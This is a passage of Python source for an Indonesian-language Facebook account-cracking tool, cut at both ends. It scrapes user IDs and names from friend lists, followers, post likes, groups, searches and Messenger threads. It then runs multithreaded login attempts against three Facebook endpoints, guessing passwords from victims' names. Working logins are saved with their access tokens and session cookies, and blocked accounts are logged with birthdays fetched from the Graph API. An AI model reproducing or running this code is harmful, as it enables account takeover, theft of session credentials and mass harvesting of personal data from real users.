try:
for i in cookies.split(";"):
result.update({i.split("=")[0]:i.split("=")[1]})
return result
except:
for i in cookies.split("; "):
result.update({i.split("=")[0]:i.split("=")[1]})
return result
# DUMP PUBLIK
def publik(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sKetik '%sme%s' jika ingin dump daftar teman sendiri "%(U,til,O,H,O))
idt = raw_input('%s%s %sTarget id%s > %s'%(U,til,O,M,K))
#simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
gas = requests.get('https://graph.facebook.com/%s?access_token=%s'%(idt,romz))
nm = json.loads(gas.text)
file = ('dump/'+nm['first_name']+'.json').replace(' ', '_')
bff = open(file, 'w')
r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,romz))
z = json.loads(r.text)
for a in z['friends']['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print '\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump id dari %s'%(H,til,nm['name']))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP FOLLOWERS
def followers(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sKetik '%sme%s' jika ingin dump followers sendiri "%(U,til,O,H,O))
idt = raw_input('%s%s %sTarget id%s > %s'%(U,til,O,M,K))
batas = raw_input('%s%s %sMaximal id%s > %s'%(U,til,O,M,K))
#simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
gas = requests.get('https://graph.facebook.com/%s?access_token=%s'%(idt,romz))
nm = json.loads(gas.text)
file = ('dump/'+nm['first_name']+'.json').replace(' ', '_')
bff = open(file, 'w')
r = requests.get('https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s'%(idt,batas,romz))
z = json.loads(r.text)
for a in z['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print ('\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id)))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump followers dari %s '%(H,til,nm["name"]))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP POSTINGAN
def postingan(romz,headers=header):
try:
os.mkdir('dump')
except:pass
try:
print ("\n%s%s %sPerlu di ingat postingan harus bersifat publik "%(U,til,O))
idt = raw_input('%s%s %sId post%s > %s'%(U,til,O,M,K))
simpan = raw_input('%s%s%s Nama file%s > %s'%(U,til,O,M,K))
r = requests.get('https://graph.facebook.com/%s/likes?limit=999999&access_token=%s'%(idt,romz))
id = []
z = json.loads(r.text)
file = ('dump/' + simpan + '.json').replace(' ', '_')
bff = open(file, 'w')
for a in z['data']:
id.append(a['id'] + '<=>' + a['name'])
bff.write(a['id'] + '<=>' + a['name'] + '\n')
print '\r%s%s%s mengumpulkan id%s >%s %s ' % (U,til,O,M,H,str(len(id))),
sys.stdout.flush();jeda(0.0050)
bff.close()
print ('\n\n%s%s Succes dump id postingan '%(H,til))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,file))
raw_input('\n%s%s%s Kembali '%(U,til,O))
menu()
except Exception as e:
exit('\n%s%s Failed dump id'%(M,til))
# DUMP GROUP
class group:
def __init__(self, cookies):
self.glist=[]
self.cookies=cookies
self.manual()
exit()
def manual(self):
print("\n%s%s%s Perlu di ingat group harus bersifat publik atau wajib join group"%(U,til,O))
id=raw_input("%s%s%s Id groups%s > %s"%(U,til,O,M,K))
if id in(""):
self.manual()
else:
r=bs4.BeautifulSoup(requests.get("https://mbasic.facebook.com/groups/"+id,headers=hdcok(),cookies=self.cookies).text,"html.parser")
if "konten tidak" in r.find("title").text.lower():
exit("%s%s input id grup yg valid goblok, id error, atau lu belom jooin di grup"%(M,til))
else:
self.listed={"id":id,"name":r.find("title").text}
self.f()
print("%s%s%s Nama grup%s > %s%s.."%(U,til,O,M,H,self.listed.get("name")[0:20]))
self.dumps("https://mbasic.facebook.com/groups/"+id)
def f(self):
self.fl=raw_input('%s%s%s Nama file %s> %s'%(U,til,O,M,K)).replace(" ","_")
if self.fl=='':self.f()
open(self.fl,"w").close()
def dumps(self, url):
r=bs4.BeautifulSoup(requests.get(url,cookies=self.cookies,headers=hdcok()).text,"html.parser")
print("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(self.fl).read().splitlines()))))
sys.stdout.flush();jeda(0.0050)
for i in r.find_all("h3"):
try:
if len(bs4.re.findall("\/",i.find("a",href=True).get("href")))==1:
ogeh=i.find("a",href=True)
if "profile.php" in ogeh.get("href"):
a="".join(bs4.re.findall("profile\.php\?id=(.*?)&",ogeh.get("href")))
if len(a)==0:continue
elif a in open(self.fl).read():
continue
else:
open(self.fl,"a+").write("%s<=>%s\n"%(a,ogeh.text))
continue
else:
a="".join(bs4.re.findall("/(.*?)\?",ogeh.get("href")))
if len(a)==0:continue
elif a in open(self.fl).read():
continue
else:
open(self.fl,"a+").write("%s<=>%s\n"%(a,ogeh.text))
except:continue
for i in r.find_all("a",href=True):
if "Lihat Postingan Lainnya" in i.text:
while True:
try:
self.dumps("https://mbasic.facebook.com/"+i.get("href"))
break
except Exception as e:
print("\r\x1b[1;91m•%s, retrying..."%e);continue
print ('\n\n%s%s Succes dump id member group '%(H,til));print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,self.fl));raw_input("\n%s%s%s kembali"%(U,til,O));menu()
def cek(arg):
if os.path.exists(".cok"):
if os.path.getsize(".cok") !=0:
return True
else:return False
else:return False
# DUMP PENCARIAN NAMA
def dumpfl():
cvds = None
cookie = None
new = None
if cek(1) == False:
try:
cookie = raw_input("\n%s%s%s Supaya bekerja masukan cookie facebook anda\n%s# %sCookie%s > %s"%(U,til,O,P,O,M,K))
cvds = cvd(cookie)
new = True
except:
print("\x1b[1;91m• invalid cookie");dumpfl()
else:
cvds = cvd(open('.cok').read().strip())
r = requests.get('https://mbasic.facebook.com/profile.php', cookies=cvds, headers=hdcok()).text
if len(bs4.re.findall('logout', r)) != 0:
if lang(cvds) != True:
exit("%s%s gagal saat mendeteksi bahasa."%(M,til))
#print("\n%s%s%s Login sebagai%s [ %s%s..]"%(U,til,O,M,H,bs4.BeautifulSoup(r,"html.parser").find("title").text[0:10]))
if new == True:
open('.cok', 'w').write(cookie)
sim=raw_input("\n%s%s%s Nama file %s>%s "%(U,til,O,M,K)).replace(" ","_")
print ("%s%s%s Example nama orang %s[ %sRomi Ganteng %s]"%(U,til,O,P,H,P))
s=raw_input("%s%s%s Sett nama %s> %s"%(U,til,O,M,K))
if s in("romi","Romi","ROMI","Romi Afrizal","Romi afrizal","ROMI AFRIZAL","romi afrizal"):
print("\n%s%s anak anjing mau crack pake nama gw "%(M,til));exit()
elif s in("Romi Ganteng","Romi ganteng","ROMI GANTENG","romi ganteng"):
print ("\n%s%s memang ganteng dong abang Romi"%(H,til));exit()
namah(sim,cvds,"https://mbasic.facebook.com/search/people/?q="+s)
else:
try:
os.remove('.cok')
except:
pass
print '\x1b[1;91m• login fail!'
dumpfl()
return
def namah(sim,r,b):
open(sim,"a+")
b=bs4.BeautifulSoup(requests.get(b, cookies=r,headers=hdcok()).text,"html.parser")
for i in b.find_all("a",href=True):
#clear()
#banner()
print("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(sim).read().splitlines())))),;sys.stdout.flush()
if "<img alt=" in str(i):
if "home.php" in str(i["href"]):
continue
else:
g=str(i["href"])
if "profile.php" in g:
name=i.find("img").get("alt").replace(", profile picture","")
d=bs4.re.findall("/profile\.php\?id=(.*?)&",g)
if len (d) !=0:
pk="".join(d)
if pk in open(sim).read():
pass
else:
open(sim,"a+").write("%s<=>%s\n"%(pk,name))
else:
d=bs4.re.findall("/(.*?)\?",g)
name=i.find("img").get("alt").replace(", profile picture","")
if len(d) !=0:
pk="".join(d)
if pk in open(sim).read():
pass
else:
open(sim,"a+").write("%s<=>%s\n"%(pk,name))
if "Lihat Hasil Selanjutnya" in i.text:
namah(sim,r,i["href"])
print ('\n\n%s%s Succes dump id pencarian nama '%(H,til));print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,sim));raw_input("\n%s%s%s kembali"%(U,til,O));menu()
# DUMP PESAN
class pesan:
def __init__(self, cookies):
self.cookies = cookies
#basecookie()
#clear()
self.f = raw_input('\n%s%s%s Nama file%s >%s '%(U,til,O,M,K)).replace(' ', '_')
if self.f == '':
pesan(cookies)
open(self.f, 'w').close()
self.dump('https://mbasic.facebook.com/messages')
def dump(self,url):
open(self.f, 'a+')
bs = bs4.BeautifulSoup(requests.get(url, headers=hdcok(), cookies=self.cookies).text, 'html.parser')
print ("\r%s%s%s mengumpulkan id %s> %s%s \x1b[1;97m- mohon tunggu\r"%(U,til,O,M,H,str(len(open(self.f).read().splitlines()))));sys.stdout.flush();jeda(0.0050)
for i in bs.find_all('a', href=True):
if '/messages/read' in i.get('href'):
f = bs4.re.findall('cid\\.c\\.(.*?)%3A(.*?)&', i.get('href'))
try:
for ip in list(f.pop()):
if self.cookies.get(' c_user') in ip:
continue
else:
if 'pengguna facebook' in i.text.lower():
continue
open(self.f, 'a+').write('%s<=>%s\n' % (ip, i.text))
except Exception as e:
continue
if 'Lihat Pesan Sebelumnya' in i.text:
self.dump('https://mbasic.facebook.com/' + i.get('href'))
print ('\n%s%s Succes dump id pesan mesengger '%(H,til))
print ('%s%s%s File dump tersimpan %s>%s %s '%(U,til,O,M,H,self.f))
raw_input("\n%s%s%s kembali"%(U,til,O));menu()
# GANTI USER AGENT
def useragent():
print ("\n%s%s%s 01 %sGanti user agents "%(U,til,P,O))
print ("%s%s%s 02 %sCek user agents "%(U,til,P,O))
print ("%s%s%s 00 %sKembali "%(U,til,M,O))
uas()
def uas():
u = raw_input('\n%s#%s Pilih%s >%s '%(P,O,M,K))
if u == '':
print '%s%s wrong input'%(M,til);jeda(2);uas()
elif u in("1","01"):
print ("%s%s%s Ketik %sMy user agent%s di browser google chrome\n%s%s%s untuk gunakan user agent anda sendiri"%(U,til,O,H,O,U,til,O))
print ("%s%s%s Ketik %sdefault%s untuk gunakan user agent bawaan tools"%(U,til,O,H,O))
try:
ua = raw_input("%s%s%s Enter user agent %s: %s"%(U,til,O,M,K))
if ua in(""):
print ("%s%s isi yang benar "%(M,til));jeda(2);menu()
elif ua in("my user agent","My User Agent","MY USER AGENT","My user agent"):
jalan("%s%s%s Anda akan di arahkan ke browser "%(U,til,O));jeda(2)
os.system("am start https://www.google.com/search?q=My+user+agent>/dev/null");jeda(2);useragent()
elif ua in("default","Default","DEFAULT"):
ua_ = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
open("data/ua.txt","w").write(ua_)
print ("\n%s%s Using the built-in user agent"%(H,til));jeda(2);menu()
open("data/ua.txt","w").write(ua);jeda(2)
print ("\n%s%s Successfully changed user agent"%(H,til));jeda(2);menu()
except KeyboardInterrupt:
exit ("\x1b[1;91m• Error ")
elif u in("2","02"):
try:
ua_ = open('data/ua.txt', 'r').read();jeda(2);print ("%s%s%s user agent anda : %s%s"%(U,til,O,H,ua_));jeda(2);raw_input("%s%s%s kembali "%(U,til,O));menu()
except IOError:
ua_ = '%s-'%(M)
elif u in("0","00"):
menu()
else:
print '%s%s wrong input'%(M,til);jeda(2);uas()
# MULAI CRACK
class ngentod:
def __init__(self):
self.id = []
def askk(self):
try:
self.apk = raw_input('\n%s%s%s file dump %s> %s'%(U,til,O,M,K))
self.id = open(self.apk).read().splitlines()
print '%s%s%s jumlah Id%s > %s%s' %(U,til,O,M,H,len(self.id))
except:
print ('\n%s%s file dump : %s%s%s tidak ada'%(M,til,K,self.apk,M));jeda(2);print('%s%s lu harus dump id dlu, pilih antara menu no 1-6 '%(M,til));jeda(3);menu()
rom = raw_input('%s%s%s gunakan password manual? y/t%s > %s'%(U,til,O,M,K))
if rom in ('Y', 'y'):
print ('\n%s%s%s contoh%s >%s sayang%s,%spengen%s,%sngentot'%(U,til,O,M,O,M,O,M,O))
while True:
pwek = raw_input('%s%s%s password %s> %s'%(U,til,O,M,K))
if pwek == '':
print("%s%s Jangan kosong"%(M,til))
elif len(pwek)<=5:
print ('%s%s sandi minimal 6 karakter'%(M,til))
else:
def xxh(xxnx=None):
skm = raw_input('\n%s#%s Pilih %s> %s '%(P,O,M,K))
if skm in(""):
print '%s%s isi yg benar sayang'%(M,til);self.xxh()
elif skm in("1","01"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.api, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif skm in("2","02"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.mbasic, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif skm in("3","03"):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
ah = uh.split('<=>')[0]
njir.submit(self.mobile, ah, xxnx)
except: pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
else:
print '\n%s%s Isi yg benar'%(M,til);jeda(2);xxh()
print '\n%s%s%s [ pilih methode crack ]\n'%(U,til,O)
print '%s%s%s 01%s methode %sb-api%s (fast crack)'%(U,til,P,O,M,O)
print '%s%s%s 02%s methode %smbasic%s (slow crack)'%(U,til,P,O,P,O)
print '%s%s%s 03%s methode %smobile%s (very slow crack)'%(U,til,P,O,H,O)
xxh(pwek.split(','))
break
elif rom in ('T', 't'):
print '\n%s%s%s [ pilih methode crack ]\n'%(U,til,O)
print '%s%s%s 01%s methode %sb-api%s (fast crack)'%(U,til,P,O,M,O)
print '%s%s%s 02%s methode %smbasic%s (slow crack)'%(U,til,P,O,P,O)
print '%s%s%s 03%s methode %smobile%s (very slow crack)'%(U,til,P,O,H,O)
self.sung()
else:
print '\n%s%s Isi yg benar'%(M,til);jeda(2);menu()
return
def api(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
response = requests.get("https://b-api.facebook.com/method/auth.login?format=json&email="+user+"&password="+pw+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if response.status_code != 200:
print ("\r\033[0;91m• IP terblokir. hidupkan mode pesawat 2 detik"),
sys.stdout.flush()
loop +=1
api(self, user, xxh)
if 'session_key' in response.text and 'EAAA' in response.text:
print ('\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,response.json()['access_token']))
wrt = ' *--> %s ◊ %s ◊ %s ' % (user,pw,response.json()['access_token'])
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif 'www.facebook.com' in response.json()['error_msg']:
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print '\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year)
wrt = ' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print '\r %s*--> %s ◊ %s ' % (K,user,pw)
wrt = ' *--> %s ◊ %s' % (user,pw)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def mbasic(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
ses = requests.Session()
ses.headers.update({"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://mbasic.facebook.com")
b = ses.post("https://mbasic.facebook.com/login.php", data={"email": user, "pass": pw, "login": "submit"})
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print ('\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,kuki))
wrt = (' *--> %s ◊ %s ◊ %s' % (user,pw,kuki))
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt'% (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print ('\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year))
wrt = (' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year))
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print ('\r %s*--> %s ◊ %s ' % (K,user,pw))
wrt = (' *--> %s ◊ %s' % (user,pw))
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def mobile(self, user, xxh):
global ok,cp,loop
print('\r%s%s%s [crack] %s/%s [OK-:%s]-[CP-:%s] '%(U,til,O,loop,len(self.id),len(ok),len(cp))),
sys.stdout.flush()
for pw in xxh:
pw = pw.lower()
try: os.mkdir('hasil')
except: pass
try:
ua = open('data/ua.txt', 'r').read()
except (KeyError, IOError):
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"])
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
p = ses.get("https://m.facebook.com")
b = bs4.BeautifulSoup(p.text, 'html.parser')
dtg = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for mi in b('input'):
if mi.get('value') is None:
if mi.get('name') == 'email':
data.update({"email":user})
elif mi.get("name")=="pass":
data.update({"pass":pw})
else:
data.update({mi.get('name'): ''})
else:
data.update({mi.get('name'): mi.get('value')})
data.update({'fb_dtsg': dtg, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
ses.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = ses.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print '\r %s*--> %s ◊ %s ◊ %s ' % (H,user,pw,kuki)
wrt = ' *--> %s ◊ %s ◊ %s' % (user,pw,kuki)
ok.append(wrt)
open('hasil/OK-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
romz = open('data/token.txt').read()
lahir = json.loads(requests.get('https://graph.facebook.com/%s?access_token=%s'%(user,romz)).text)["birthday"]
month, day, year = lahir.split('/')
month = bulan1[month]
print '\r %s*--> %s ◊ %s ◊ %s %s %s ' % (K,user,pw,day,month,year)
wrt = ' *--> %s ◊ %s ◊ %s %s %s' % (user,pw,day,month,year)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
except (KeyError, IOError):
lahir = ''
except:
pass
print '\r %s*--> %s ◊ %s ' % (K,user,pw)
wrt = ' *--> %s ◊ %s' % (user,pw)
cp.append(wrt)
open('hasil/CP-%s-%s-%s.txt' % (ha, op, ta), 'a').write('%s\n' % wrt)
break
continue
loop += 1
def sung(self):
ii = raw_input('\n%s#%s Pilih %s>%s '%(P,O,M,K))
if ii == '':
print '\n%s%s isi yang benar '%(M,til);self.sung()
elif ii in ('1', '01'):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.api, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif ii in ('2', '02'):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.mbasic, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
elif ii in ('3', '03'):
print '\n%s%s%s akun %s[OK] %stersimpan ke file %s> %shasil/OK-%s-%s-%s.txt'%(U,til,O,H,O,M,H,ha, op, ta);jeda(0.2)
print '%s%s%s akun %s[%sCP%s]%s tersimpan ke file %s> %shasil/CP-%s-%s-%s.txt'%(U,til,O,M,K,M,O,M,K,ha, op, ta);jeda(0.2)
print('%s!%s crack berjalan, tekan CTRL+Z untuk stop\n'%(U,O));jeda(0.2)
with Lampung(max_workers=30) as njir:
for uh in self.id:
try:
uid, name = uh.split('<=>')
i = name.split(' ')
if len(i) == 3 or len(i) == 4 or len(i) == 5 or len(i) == 6:
pwx = [name, i[0]+"123", i[0]+"12345"]
else:
pwx = [name, i[0]+"123", i[0]+"12345"]
njir.submit(self.mobile, uid, pwx)
except:
pass
os.remove(self.apk)
exit("\n%s%s finished "%(H,til))
else:
print '\n%s%s isi yang benar'%(M,til);self.sung()
# CEK OPSI
def opsi():
hasil = ("hasil/")
print("\n%s%s%s Masukan file [ ex%s: %sCP-%s-%s-%s.txt%s ]"%(U,til,O,M,K,ha,op,ta,O))
romi = raw_input("%s%s%s Nama file %s> %s"%(U,til,O,M,K))
if romi == "":
print("%s%s isi yang benar "%(M,til));jeda(2);opsi()
try:
file_cp = open(hasil+romi, "r").readlines()
except IOError:
exit("\n%s%s nama file %s tidak tersedia"%(M,til,romi))
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
print("%s%s%s Total akun %s: %s%s"%(U,til,O,M,P,len(file_cp)));jeda(2)
print(" %s# %s---------------------------------------- %s#"%(P,M,P));jeda(2)
for fb in file_cp:
akun = fb.replace("\n","")
ngecek = akun.split(" ◊ ")
print("\n%s%s%s cek akun %s: %s%s"%(U,til,O,M,K,akun.replace(" *--> ","")));jeda(0.07)
try:
mengecek(ngecek[0].replace(" *--> ",""), ngecek[1])
except requests.exceptions.ConnectionError:
pass
print("\n%s%s%s Selesai "%(U,til,O));jeda(0.07)
raw_input("%s%s%s kembali "%(U,til,O));jeda(0.07)
menu()
def mengecek(user, pw):
mb = ("https://mbasic.facebook.com")
ua = ("Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36")
ses = requests.Session()
